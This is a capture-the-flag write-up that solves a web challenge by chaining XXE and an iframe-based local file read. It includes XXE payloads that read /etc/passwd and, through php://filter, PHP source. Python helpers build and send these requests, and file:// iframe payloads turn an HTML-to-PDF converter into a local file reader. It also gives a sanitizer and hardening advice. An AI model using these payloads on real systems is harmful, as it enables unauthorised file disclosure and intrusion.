Tags: lfi xxe web
Rating: 5.0
# Include me
## Description
> Zero Dollar Security is hiring infosec enthusiast. Apply ASAP. Connect at chall.ctf-ehcon.ml:32104
## Solution
This application has just a register function.

Use Burp Suite to intercept the request.
- As we can see, the body of the request is XML
- The response echoes back the `username` that was sent
--> This might contain an XXE vulnerability

First, try to read a file such as `/etc/passwd` through an external entity (the `DOCTYPE` line is reconstructed here; the original page lost it in extraction):
```xml
<?xml version="1.0"?>
<!-- DOCTYPE reconstructed for this writeup: the extraction dropped it -->
<!DOCTYPE root [<!ENTITY ext SYSTEM "file:///etc/passwd">]>
<root>
<email>&ext;</email>
<password>none</password>
</root>
```
That works, so continue reading other files such as `flag.txt`, `flag.php`... but I get nothing.
When I try to list a directory, I receive a strange response containing a newline character `\n`.
So use another method to read the file. Since the application runs on `PHP`, the `php://filter` wrapper can read a file and return it base64-encoded, which keeps PHP source (with its own `<?php` tag) from breaking the XML or being executed.
- The filename `flag.php` is a guess
```xml
<?xml version="1.0"?>
<!-- DOCTYPE reconstructed for this writeup; the resource path is assumed to be relative to the web root -->
<!DOCTYPE root [<!ENTITY ext SYSTEM "php://filter/convert.base64-encode/resource=flag.php">]>
<root>
<email>&ext;</email>
<password>none</password>
</root>
```
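To automate the two XXE requests above, here is an added Python helper (my own example, not part of the original writeup or the challenge). It builds the register body with the external entity `ext`, either reading a file directly or through `php://filter`, and base64-decodes whatever the server echoes back. The host and port come from the challenge description; the request path `/register`, the `Content-Type`, and the assumption that the response is an HTML/text body reflecting the expanded entity are my guesses. The sample response used for the offline run is constructed around a stand-in PHP file, not the real `flag.php`.

```python
import base64
import http.client
import re

# Host and port from the challenge description; the path is an assumption.
TARGET_HOST = "chall.ctf-ehcon.ml"
TARGET_PORT = 32104
REGISTER_PATH = "/register"  # assumed, not shown on the page


def xxe_body(resource: str, use_php_filter: bool = True) -> str:
    """Return the register request body with an external entity `ext`.

    With use_php_filter=True the entity reads the target through
    php://filter/convert.base64-encode, so PHP source comes back as one
    base64 token instead of being executed or breaking the XML with '<?php'.
    With use_php_filter=False it reads the file directly, which is fine for
    plain text such as /etc/passwd.
    """
    if use_php_filter:
        target = f"php://filter/convert.base64-encode/resource={resource}"
    else:
        target = f"file://{resource}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY ext SYSTEM "{target}">]>\n'
        "<root>\n"
        "<email>&ext;</email>\n"
        "<password>none</password>\n"
        "</root>\n"
    )


def extract_base64(response_text: str) -> str:
    """Pick the longest base64-looking token out of the echoed response.

    Assumption: the server reflects the expanded entity somewhere in an
    HTML/text body, so the file content is the longest base64 run present.
    """
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_text)
    if not runs:
        raise ValueError("no base64 token found in response")
    return max(runs, key=len)


def decode_source(response_text: str) -> str:
    """Base64-decode the reflected php://filter output back to source text."""
    return base64.b64decode(extract_base64(response_text)).decode("utf-8", "replace")


def send_xml(body: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
             path: str = REGISTER_PATH, timeout: float = 10.0) -> str:
    """POST the XML body and return the response text (needs the live target)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("POST", path, body=body.encode(),
                 headers={"Content-Type": "application/xml"})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return text


# Constructed stand-in for what flag.php might contain; NOT the challenge file.
SAMPLE_PHP = (
    "<?php\n"
    "// constructed stand-in, not the real flag.php\n"
    "$content = $_POST['content'];\n"
    "file_put_contents('/var/www/html/files/result.html', $content);\n"
)
# Constructed response: the application echoing the expanded entity back.
SAMPLE_RESPONSE = (
    "<html><body>Welcome, "
    + base64.b64encode(SAMPLE_PHP.encode()).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    print(xxe_body("/etc/passwd", use_php_filter=False))
    print(xxe_body("flag.php"))
    print(decode_source(SAMPLE_RESPONSE))
    # Against the live target: print(decode_source(send_xml(xxe_body("flag.php"))))
```

The direct `file://` form is what the first payload did; the `php://filter` form is what finally returned `flag.php`, because the base64 wrapper turns a file full of `<` and `?` into a single XML-safe token.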

Okay, good response; base64-decode it. Reading the code a bit:
- It takes the `content` parameter from a `POST` request
- It writes `content` into a newly created file
- It saves two files, `.html` and `.pdf`, under `/var/www/html/files/`
```php
```
What do we get from this snippet?
- We can put our payload into an `html` file
- There is a new directory `/var/www/html/files/`
Well, observe the new directory a bit.

Now, how can we capture the flag with HTML data we control? Can we read a file or list a directory?
We can definitely do it with an `iframe` tag in HTML: the HTML-to-PDF conversion renders whatever `src` the iframe points at, including `file://` URLs on the server itself.
--> LFI via iframe
Replace the body of the `POST` request: instead of XML, send the `content` parameter.

My payload:
- Directory listing of `/`
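The payload itself was a screenshot that did not survive, so here is an added example (mine, not the author's) of how the `content` parameter can be built for any set of `file://` targets, how the flag can be pulled out of text extracted from the resulting PDF, and, for contrast, an allowlist sanitizer that would have removed the iframe before conversion. The iframe dimensions are arbitrary, the target paths are the ones named in this writeup, and the sample PDF text is constructed.

```python
import html
import re
import urllib.parse
from html.parser import HTMLParser

FLAG_RE = re.compile(r"EHACON\{[^}]*\}")


def iframe_payload(targets, width=1000, height=1500) -> str:
    """HTML that makes the server-side HTML-to-PDF conversion fetch local paths.

    Each iframe's src is a file:// URL. A directory path yields a listing in
    renderers that index directories; a file path yields its contents.
    The dimensions are arbitrary, just large enough that a listing is not clipped.
    """
    frames = "\n".join(
        f'<iframe src="file://{t}" width="{width}" height="{height}"></iframe>'
        for t in targets
    )
    return f"<html><body>\n{frames}\n</body></html>\n"


def form_body(content_html: str) -> str:
    """application/x-www-form-urlencoded body carrying the POST `content` parameter."""
    return urllib.parse.urlencode({"content": content_html})


def find_flags(pdf_text: str) -> list:
    """Flags found in text extracted from result.pdf (e.g. with pdftotext)."""
    return FLAG_RE.findall(pdf_text)


# Hardened counterpart: what the upload handler should run on `content`
# before handing it to the converter. Tags not in the allowlist vanish,
# and no attribute (src, href, on*) survives.
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "h1", "h2", "h3", "ul", "ol", "li"}


class _Allowlist(HTMLParser):
    """Rebuild HTML keeping only allowlisted tags and dropping every attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:          # iframe/object/embed/script/link are dropped
            self.out.append(f"<{tag}>")  # attributes are never copied

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_html(untrusted: str) -> str:
    """Return untrusted HTML reduced to the allowlist above."""
    p = _Allowlist()
    p.feed(untrusted)
    p.close()
    return "".join(p.out)


# Constructed sample of text extracted from a PDF; not the real result.pdf.
SAMPLE_PDF_TEXT = "Index of /ctf/\nFlag is : EHACON{lf1_@nd_xx3_1s_fun}\n"

if __name__ == "__main__":
    payload = iframe_payload(["/", "/ctf/"])
    print(form_body(payload))
    print(find_flags(SAMPLE_PDF_TEXT))
    print(sanitize_html(payload))
```

The allowlist is the cheap fix on the input side; the fix that actually closes this class of bug is running the HTML-to-PDF converter with local file access disabled and no network, so that an `iframe`, `<link>`, `<object>` or CSS `url()` pointing at `file://` has nothing to fetch.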

After sending the request, refresh (F5) the application and we get new files.

Nice, check out the content of the file `result.pdf`.

Where is the flag? Ah, it's in `/ctf/`. List the directory `/ctf/`.

The flag is captured:
```
Flag is : EHACON{lf1_@nd_xx3_1s_fun}
```